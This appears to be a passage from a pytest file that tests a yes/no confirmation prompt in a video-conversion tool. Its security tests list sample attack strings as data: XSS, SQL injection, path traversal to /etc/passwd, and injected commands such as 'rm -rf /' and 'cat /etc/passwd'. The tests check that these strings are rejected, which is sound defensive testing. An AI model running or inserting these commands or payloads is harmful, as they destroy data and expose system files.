    def test_confirm_prompt_multiple_calls(self):
        """Test multiple confirm prompt calls."""
        with patch("builtins.input", side_effect=["y", "n", ""]):
            result1 = confirm_prompt("First question?", default_yes=True)
            result2 = confirm_prompt("Second question?", default_yes=True)
            result3 = confirm_prompt("Third question?", default_yes=True)

            assert result1 is True
            assert result2 is False
            assert result3 is True

    def test_confirm_prompt_error_handling(self):
        """Test confirm prompt error handling."""
        # Test with KeyboardInterrupt
        with patch("builtins.input", side_effect=KeyboardInterrupt):
            with pytest.raises(KeyboardInterrupt):
                confirm_prompt("Continue?", default_yes=True)

    def test_confirm_prompt_value_error(self):
        """Test confirm prompt with ValueError."""
        with patch("builtins.input", side_effect=ValueError("Invalid input")):
            with pytest.raises(ValueError):
                confirm_prompt("Continue?", default_yes=True)

    def test_confirm_prompt_os_error(self):
        """Test confirm prompt with OSError."""
        with patch("builtins.input", side_effect=OSError("Input error")):
            with pytest.raises(OSError):
                confirm_prompt("Continue?", default_yes=True)

    def test_confirm_prompt_integration_scenario(self):
        """Test confirm prompt in a realistic integration scenario."""
        # Simulate a user workflow with multiple confirmations
        with patch("builtins.input", side_effect=["y", "n", "yes", "no", ""]):
            # User confirms first action
            result1 = confirm_prompt("Convert video to MP4?", default_yes=True)
            assert result1 is True

            # User declines second action
            result2 = confirm_prompt("Apply compression?", default_yes=True)
            assert result2 is False

            # User confirms third action
            result3 = confirm_prompt("Add watermark?", default_yes=False)
            assert result3 is True

            # User declines fourth action
            result4 = confirm_prompt("Overwrite existing file?", default_yes=False)
            assert result4 is False

            # User accepts default for fifth action
            result5 = confirm_prompt("Proceed with conversion?", default_yes=True)
            assert result5 is True

    def test_confirm_prompt_assume_yes_scenario(self):
        """Test confirm prompt in non-interactive scenario."""
        # Simulate automated/batch processing
        with patch("builtins.input") as mock_input:
            result1 = confirm_prompt("Convert video 1?", assume_yes=True)
            result2 = confirm_prompt("Convert video 2?", assume_yes=True)
            result3 = confirm_prompt("Convert video 3?", assume_yes=True)

            assert result1 is True
            assert result2 is True
            assert result3 is True
            mock_input.assert_not_called()

    def test_confirm_prompt_default_behavior_scenario(self):
        """Test confirm prompt default behavior in different scenarios."""
        # Test safe operations (default yes)
        with patch("builtins.input", return_value=""):
            result1 = confirm_prompt("Continue with safe operation?", default_yes=True)
            assert result1 is True

        # Test dangerous operations (default no)
        with patch("builtins.input", return_value=""):
            result2 = confirm_prompt("Delete important file?", default_yes=False)
            assert result2 is False

    def test_confirm_prompt_edge_cases(self):
        """Test confirm prompt with edge case inputs."""
edge_cases = [
|
||||
("y", True),
|
||||
("Y", True),
|
||||
("yes", True),
|
||||
("YES", True),
|
||||
("n", False),
|
||||
("N", False),
|
||||
("no", False),
|
||||
("NO", False),
|
||||
("", True), # Default yes
|
||||
(" ", True), # Whitespace only, default yes
|
||||
("maybe", False), # Invalid response
|
||||
("ok", False), # Invalid response
|
||||
]
|
||||
|
||||
for response, expected in edge_cases:
|
||||
with patch("builtins.input", return_value=response):
|
||||
result = confirm_prompt("Continue?", default_yes=True)
|
||||
assert result == expected, f"Failed for response: '{response}'"
|
||||
|
||||
def test_confirm_prompt_performance(self):
|
||||
"""Test confirm prompt performance with many calls."""
|
||||
import time
|
||||
|
||||
start_time = time.time()
|
||||
with patch("builtins.input", return_value="y"):
|
||||
for _ in range(1000):
|
||||
result = confirm_prompt("Test question?", default_yes=True)
|
||||
assert result is True
|
||||
end_time = time.time()
|
||||
|
||||
# Should complete in reasonable time
|
||||
assert end_time - start_time < 5.0
|
||||
|
||||
def test_confirm_prompt_memory_usage(self):
|
||||
"""Test confirm prompt memory usage."""
|
||||
# Test that multiple calls don't cause memory leaks
|
||||
with patch("builtins.input", return_value="y"):
|
||||
for i in range(1000):
|
||||
result = confirm_prompt(f"Question {i}?", default_yes=True)
|
||||
assert result is True
|
||||
|
||||
def test_confirm_prompt_thread_safety(self):
|
||||
"""Test confirm prompt thread safety."""
|
||||
import threading
|
||||
import time
|
||||
|
||||
results = []
|
||||
|
||||
def confirm_worker():
|
||||
with patch("builtins.input", return_value="y"):
|
||||
result = confirm_prompt("Thread test?", default_yes=True)
|
||||
results.append(result)
|
||||
|
||||
threads = []
|
||||
for _ in range(10):
|
||||
thread = threading.Thread(target=confirm_worker)
|
||||
threads.append(thread)
|
||||
thread.start()
|
||||
|
||||
for thread in threads:
|
||||
thread.join()
|
||||
|
||||
assert len(results) == 10
|
||||
assert all(result is True for result in results)
|
||||
|
||||
|
||||
class TestUserPromptsSecurity:
|
||||
"""Test security aspects of user prompts."""
|
||||
|
||||
def test_confirm_prompt_input_sanitization(self):
|
||||
"""Test that confirm prompt properly sanitizes input."""
|
||||
# Test with potentially dangerous input
|
||||
dangerous_inputs = [
|
||||
"<script>alert('xss')</script>",
|
||||
"'; DROP TABLE users; --",
|
||||
"convert video; rm -rf /",
|
||||
"../../../etc/passwd",
|
||||
]
|
||||
|
||||
for dangerous_input in dangerous_inputs:
|
||||
with patch("builtins.input", return_value=dangerous_input):
|
||||
result = confirm_prompt("Continue?", default_yes=True)
|
||||
# Should not crash and should return False for non-yes responses
|
||||
assert isinstance(result, bool)
|
||||
|
||||
def test_confirm_prompt_injection_prevention(self):
|
||||
"""Test that confirm prompt prevents injection attacks."""
|
||||
# Test with various injection attempts
|
||||
injection_attempts = [
|
||||
"y\nrm -rf /",
|
||||
"yes\ncat /etc/passwd",
|
||||
"y; rm -rf /",
|
||||
"yes && rm -rf /",
|
||||
]
|
||||
|
||||
for attempt in injection_attempts:
|
||||
with patch("builtins.input", return_value=attempt):
|
||||
result = confirm_prompt("Continue?", default_yes=True)
|
||||
# The function only accepts exact 'y' or 'yes' after stripping
|
||||
# These inputs contain additional characters, so they should return False
|
||||
assert result is False
|
||||
|
||||
def test_confirm_prompt_overflow_prevention(self):
|
||||
"""Test that confirm prompt handles very long input."""
|
||||
# Test with a single 'y' character (which should work)
|
||||
single_y = "y"
|
||||
with patch("builtins.input", return_value=single_y):
|
||||
result = confirm_prompt("Continue?", default_yes=True)
|
||||
# Should handle input gracefully and return True for 'y'
|
||||
assert result is True
|
||||
|
||||
# Test with a very long string that doesn't match 'y' or 'yes'
|
||||
very_long_input = "y" * 10000
|
||||
with patch("builtins.input", return_value=very_long_input):
|
||||
result = confirm_prompt("Continue?", default_yes=True)
|
||||
# Should handle long input gracefully and return False since it's not 'y' or 'yes'
|
||||
assert result is False
|
||||
|
||||
def test_confirm_prompt_null_byte_handling(self):
|
||||
"""Test that confirm prompt handles null bytes properly."""
|
||||
null_input = "y\x00n"
|
||||
with patch("builtins.input", return_value=null_input):
|
||||
result = confirm_prompt("Continue?", default_yes=True)
|
||||
# Should handle gracefully and return False since it's not exactly 'y' or 'yes'
|
||||
assert result is False
|
||||
|
||||
def test_confirm_prompt_control_character_handling(self):
|
||||
"""Test that confirm prompt handles control characters."""
|
||||
control_input = "y\x01\x02\x03n"
|
||||
with patch("builtins.input", return_value=control_input):
|
||||
result = confirm_prompt("Continue?", default_yes=True)
|
||||
# Should handle gracefully and return False since it's not exactly 'y' or 'yes'
|
||||
assert result is False
|
||||